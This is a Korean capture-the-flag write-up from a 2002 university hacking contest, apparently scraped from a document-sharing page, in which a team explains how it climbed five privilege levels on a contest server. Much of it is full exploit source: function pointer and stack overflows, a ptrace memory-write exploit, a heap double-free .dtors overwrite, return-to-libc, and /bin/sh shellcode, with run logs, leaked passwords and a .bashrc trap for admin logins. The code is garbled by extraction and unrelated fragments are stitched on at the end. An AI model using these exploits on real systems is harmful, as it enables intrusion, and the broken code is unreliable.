Microsoft Word - readme.doc

Size: px

Start display at page:

Download "Microsoft Word - readme.doc"

지미 예
7 years ago
Views:

1 ========================================================= 제 1 회광주과기원정보통신공학과 SW 경진대회 (Hacking 경진대회 ) 대회시작 : 2002 년 8 월 8 일 ( 목 ) 오후 9:00 ( 한국시간, GMT+9:00) 대회종료 : 2002 년 8 월 10 일 ( 토 ) 오후 9:00 ( 한국시간, GMT+9:00) ========================================================= * 참고로, 문서는 Word 6.0 환경에서작성되었습니다. 문서를읽으실때는 Word 6.0 프로그램을이용해주시기바랍니다. * 작성자 : INetCop Team. * 목차 "\x00": 간단한소개글. "\x01": A Server Level1 Step? archmage 해킹하여권한얻기. "\x02": A Server Level2 Step? farseer 해킹하여권한얻기. "\x03": A Server Level3 Step? dreadlord 해킹하여권한얻기. "\x04": A Server Level4 Step? demonhunter 해킹하여권한얻기. "\x05": A Server Level5 Step? sargeras 해킹하여권한얻기. "\x06": B Server? "\x07": 끝인사. "\x00": 간단한소개글. 안녕하세요. 이렇게만나뵙게되서반갑습니다. 저희는이번대회에 INetCop Team 으로참가하게되었습니다. 저의팀의실제참가인원은 2 명입니다. 그럼, 이제본문으로들어가보도록합시다. "\x01": A Server Level1 Step? archmage 해킹하여권한얻기. 저희 Team 은다음과같이권한의 Password 를얻을수있었습니다. id - archmage passwd - wjdfudrhkgkarp netcat 은원격지에패킷을보낼수있는네트워크해킹도구입니다. 이 netcat 을이용한 UDP 접속을통해다음과같이 archmage 의 password 를얻을수있었습니다. 프로그램경로 - "/usr/local/bin/spamecho"

2 "\x02": A Server Level2 Step? farseer 해킹하여권한얻기. id - farseer passwd - dnfqnwlwsmswk 프로그램에는전형적인 buffer overflow 취약점이존재하였습니다. successnprintpasswd() 함수를실행시키면다음 level 권한의 password 를얻을수있습니다. 다음은프로그램에서쓰인함수입니다 <successnprintpasswd> <fail> <main> --- 0x82-Funcwrite.c --- /* Overflow, Function Pointer Overwrite Exploit exploit by "you dong-hun"(xpl017elz), <[email protected]>. My World:

3 Special Greets: INetCop team, pr1nc3, etc exploiters. */ #include <stdio.h> #define SUCCESS 0x // function pointer address int main(int gc, char gv) { int tk1; unsigned long tk2 = SUCCESS; char x82[0x82]; memset(x82, 0, 0x82); if(gc > 1) { tk2 = strtoul(gv[1], NULL, NULL); for(tk1 = 0; tk1 < 20; tk1++) { x82[tk1] = 0x82; x82[tk1++] = (tk2 & 0x000000ff) >> 0; x82[tk1++] = (tk2 & 0x0000ff00) >> 8; x82[tk1++] = (tk2 & 0x00ff0000) >>16; x82[tk1++] = (tk2 & 0xff000000) >>24; printf("%s", x82); 자, 이제 successnprintpasswd() 의주소를 return address 에 overwrite 시킵니다. 위와같이성공할수있었습니다. "\x03": A Server Level3 Step? dreadlord 해킹하여권한얻기. id - dreadlord passwd - DEATHNREBIRTH

4 letsdance 프로그램을 ptrace process control flow 를일으켜 return address 영역을원하는주소로변경합니다. 이때, 원하는부분의값을출력하여받기위해 prelude 과정을작성하여실행하고자원하는주소에덮어씌웠습니다. 1) 이전의 stack frame 을 bp 에저장함. push %ebp 2) 그후현재 stack frame 의 sp 값을 bp 로복사함. mov %esp,%ebp 위의두명령은새로운함수를수행할때시행합니다. 이명령을호출하고자하는부분에집어넣었습니다. 그후실행한결과내부의 monoalphabetic 방식으로암호화된 password 를얻을수있었습니다. Debugging - 다음은쉽게구현된 Exploit code 입니다 x82-Ptread.xpl.c --- /* Ptrace Memory Read Exploit exploit by "you dong-hun"(xpl017elz), <[email protected]>. My World: Special Greets: INetCop team, etc exploiters. */ #include <linux/ptrace.h>

5 unsigned long retr = 0x , addr = 0x080485xx; int main() { unsigned long code = 0x68e58955, x0x = 0x080485xx; /* push %ebp mov %esp,%ebp c0de = " x55 x89 xe5 x68" */ int pid; if((pid = fork()) ==0) { ptrace(ptrace_traceme, 0, 1, 0 ); execl("./letsdance", "letsdance", 0); wait((int*) 0); // Overwriting return address ptrace(ptrace_pokedata, pid, retr, x0x); ptrace(ptrace_pokedata, pid, retr+0x04, x0x); ptrace(ptrace_pokedata, pid, retr+0x04, x0x); ptrace(ptrace_pokedata, pid, retr+0x04, x0x); ptrace(ptrace_pokedata, pid, retr+0x04, x0x); ptrace(ptrace_pokedata, pid, retr+0x04, x0x); // Make operand ptrace(ptrace_pokedata, pid, addr, code); ptrace(ptrace_syscall, pid, 1, 0); 이후, example.txt 파일을 crank(cryptanalysis toolkit) 프로그램으로해독하여암호화방식을찾아냈습니다. 물론, 얻어낸 password 를대입하여본 password 를얻을수있었습니다. 참고로아래 Cipher text 를얻으려면해독과정을반드시거쳐야합니다. 프로그램에서얻어낸 password "SVRUKCZVJOZUK" 를차례로해독해보았습니다.

6 결론 - 암호화된패스워드 - SVRUKCZVJOZUK 해독된패스워드 - DEATHNREBIRTH "\x04": A Server Level4 Step? demonhunter 해킹하여권한얻기. id - demonhunter passwd -? jumpjump setuid 설정프로그램이 home 디렉토리에존재합니다. 그프로그램에는전형적인 Heap 기반에 double free() 취약점이존재합니다. exploit 성공후 gid nightelf 권한을얻을시,.bash_profile,.bashrc,.bash_logout 파일등을수정하여, 실제관리자 (root) 나 password 를알고있는주최측의 user 가 login 할때까지대기하였습니다. 아래두 source code 는저희가공격했을때사용한 exploit 입니다. --- eggshell.c --- #include <stdlib.h> #include <stdio.h> #define OFFSET 0 #define BUFFERS 512 #define EGGS 2048 #define NOP 0x90 char shellcode[] = /* setreuid(504, 504) c0de 20byte + shellc0de 45byte */ " x31 xdb" /* xor ebx, ebx */ " x31 xc9" /* xor ecx, ecx */ " xbb xf8 x01 xff xff" /* mov $0x1f8, ebx */ " xb9 xf8 x01 xff xff" /* mov $0x1f8, ecx */ " x31 xc0" /* xor eax, eax */ " xb0 x46" /* mov $0x46, al */ " xcd x80" /* int $0x80 */ " xeb x1d" /* x0xx0xk0kk0kl0ll0lg00g00g00g00g00 */ " x5e x88 x46 x07 x89 x46 x0c x89 x76 x08 x89 xf3" " x8d x4e x08 x8d x56 x0c xb0 x0b xcd x80 x31 xc0" " x31 xdb x40 xcd x80 xe8 xde xff xff xff/bin/sh"; unsigned long ep(void) { asm ("movl %esp,%eax"); main(int argc, char *argv[]) { char *b, *p, *e; long *a, d; int o = OFFSET,

7 bs = BUFFERS, i, es = EGGS; if (argc > 1) bs = atoi(argv[1]); if (argc > 2) o = atoi(argv[2]); if (argc > 3) es = atoi(argv[3]); if (!(b = malloc(bs))) { printf("sorry~! n"); exit(0); if (!(e = malloc(es))) { printf("sorry~! n"); exit(0); d = ep() - o; printf(" n Using shellcode address: %p n n", d); p = b; a = (long *) p; for(i = 0; i < bs; i+=4) { *(a++) = d; p = e; for(i = 0; i < es - strlen(shellcode) - 1; i++) { *(p++) = NOP; for(i = 0; i < strlen(shellcode); i++) { *(p++) = shellcode[i]; b[bs - 1] = ' 0'; e[es - 1] = ' 0'; memcpy(e,"egg=",4); putenv(e); memcpy(b,"ret=",4); putenv(b); system("`which bash`"); --- 0x82-Dbfree.xpl.c --- /* Heap based double free Exploit :-p --- How to Exploit? --- sh-2.05a$./eggshell Using shellcode address: 0xbffffc18 sh-2.05a$./0x82-dbfree.xpl 0xbffffc18 >> Processing starts >> Memory for message is ready. >> Memory for key is ready. >> Using default key >> Key is generated: -25 >>Encoding >>Encoding Completed >>Encoded message: x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82 x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82x82 sh-2.05a$ whoami demonhunter sh-2.05a$ ---

8 Happy Exploit! exploit by "you dong-hun"(xpl017elz), My World: Special Greets: INetCop team, etc exploiters. */ #include <stdio.h> #include <string.h> #define DTORS 0x08049cc4 #define SHELL 0xbffffa98 int main(int argc, char *argv[]) { int ax82; unsigned long dtorsr = DTORS, shaddr = SHELL; char c0de[1024]; bzero(&c0de, 1024); if(argc > 1) { shaddr = strtoul(argv[1], NULL, NULL); if(argc > 2) { dtorsr = strtoul(argv[2], NULL, NULL); for(ax82 = 0; ax82 < 128; ax82++) { c0de[ax82] = 0x82; // Make fake chunk! *(long *)&c0de[ax82] = 0xfffffffc; *(long *)&c0de[ax82+4] = 0xffffffff; *(long *)&c0de[ax82+8] = dtorsr - 0x0c; *(long *)&c0de[ax82+12] = shaddr; // execute jumpjump program execl("/home/dreadlord/jumpjump", "jumpjump", c0de, 0); 실행결과 -

9 "\x05": A Server Level5 Step? sargeras 해킹하여권한얻기. id - sargeras passwd -? fried_egg setuid 설정프로그램을이용하여 buffer overflow exploit 을성공하였습니다. 단, 환경변수에 shellcode 를담는 eggshell code 를이용할수없도록개발된프로그램이였습니다. exploit 할수있는방법은여러가지가있습니다. 저희는두가지방법을이용하여새로운 shell 을실행하는데성공하였습니다. 방법 1) Lamagra 의 Omega Project 를이용한 exploit. 방법 2) 프로그램인수입력에의한 shellcode exploit. 1) 방법첫번째 exploit code x82-Omega.c --- /* Omega Project exploit. exploit by "you dong-hun"(xpl017elz), <[email protected]>. My World: Special Greets: INetCop team, etc exploiters. */ #define SYSTEM 0x42049e54 #define OFFSET 0x

10 int main() { int ax82, bx82; long shell; char atx[256], buf[1024]; bzero(&atx, 256); bzero(&buf, 1024); for(ax82 = 0; ax82 < 0x14; ax82 += 4) { *(long*)&atx[ax82] = OFFSET; *(long*)&atx[ax82] = SYSTEM; *(long*)&atx[ax82+4] = OFFSET; shell = SYSTEM; while(memcmp((void*)shell,"/bin/sh",8)) shell++; *(long*)&atx[ax82+8] = shell; printf("%s",atx); 2) 방법두번째 exploit x82-x0xg00.c --- /* Very g00d idea Buffer Overflow exploit --- How to Exploit? --- sh-2.05a$ (./0x82-x0xg00 -r;cat)./fried_egg `./0x82-x0xg00 -s` Question : People like eggs for many different reasons. It is nutritious, delicious and quite pretty^^ Why do you think people like eggs? ======================================================== Thank you for your submission. --- u get newshell. jump! uid 505. exploit by "you dong-hun"(xpl017elz), <[email protected]>. My World: Special Greets: INetCop team, etc exploiters. */

11 #include <stdio.h> #include <strings.h> #include <stdlib.h> #include <getopt.h> #define SHELLADD 0xbffffbe8 #define Xpl017Elz x82 (lol~) void usage(char *argx); void returnx(u_long shc0de); void makec0de(void); char x0x[0x82]; /* x0x! */ char g00[0x82]; /* g00! */ void usage(char *argx) { printf(" n Usage: %s -option [arguments] n n", argx); printf(" t-a [&shellcode] - &shellcode address n"); printf(" t-r - printing returncode n"); printf(" t-s - ptinting shellcode n n"); printf(" Example> %s -a 0x s -r n n", argx); void returnx(u_long shc0de) { int xret; memset(g00, 0, 0x82); for(xret = 0; xret < 0x50; xret += 4) { g00[xret+0] = (shc0de & 0x000000ff) >> 0; g00[xret+1] = (shc0de & 0x0000ff00) >> 8; g00[xret+2] = (shc0de & 0x00ff0000) >>16; g00[xret+3] = (shc0de & 0xff000000) >>24; int main(int argc, char *argv[]) { int xwhile; unsigned long shaddr = SHELLADD; while((xwhile = getopt(argc, argv, "a:rs"))!= EOF) { switch(xwhile) { case 'a':

12 case 'r': case 's': case '?': shaddr = strtoul(optarg, 0, 0); break; returnx(shaddr); printf("%s", g00); /* printing &shellc0de */ break; makec0de(); printf("%s", x0x); /* printing shellc0de */ break; usage(argv[0]); break; /* very easy? */ void makec0de(void) { int xnop, xc0de; char shell[] = /* setreuid(505,505) jumpc0de 20byte + shellc0de 45byte */ " x31 xdb x31 xc9 xbb xf9 x01 xff xff xb9 xf9 x01 xff xff x31 xc0" " xb0 x46 xcd x80" /* hehe :-p */ " xeb x1f x5e x89 x76 x08 x31 xc0 x88 x46 x07 x89 x46 x0c xb0 x0b" " x89 xf3 x8d x4e x08 x8d x56 x0c xcd x80 x31 xdb x89 xd8 x40 xcd" " x80 xe8 xdc xff xff xff/bin/sh"; memset(x0x, 0, 0x82); for(xnop = 0; xnop < 0x80; xnop++) { x0x[xnop] = 0x90; /* n0p! */ for(xc0de = 0; xc0de < strlen(shell); xc0de++) { x0x[xnop++] = shell[xc0de]; /* make shellc0de */

13 실행결과 - "\x06": B Server? B Server 정보가담긴 text 를통해열린 Port 로공격을시도할수있었습니다. 서버에는, 전형적인배열범위의 remote format string 취약점을가진 login 프로그램 (?) 이존재했습니다. 뒤늦게발견한점이매우안타깝지만, 위 URL 의내용을통해 exploit 의성공률을더높일수있을것입니다. 매우유사한문제같더군요. :-) "\x07": 끝인사. 여기까지읽어주신여러분감사합니다. 대회의문제와난이도, 내용은매우흥미로웠습니다. 하지만, 대회중간에트릭을이용해올라온사용자들이좀있었던것같습니다. 운영상의문제점이라하면, 모두쓰고읽을수있는 /tmp 디렉토리의권한이열려있던점과남의프로세스를읽어드릴수있는명령을사용할수있었다는사실입니다. 물론, 백도어를실행하고프로세스를뒤져가며열심히삽질했던분들에게박수를보냅니다. ^^ 모두들수고하셨습니다. 대회를운영하느라고생하신운영진님들수고하셨습니다. 감사합니다.

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow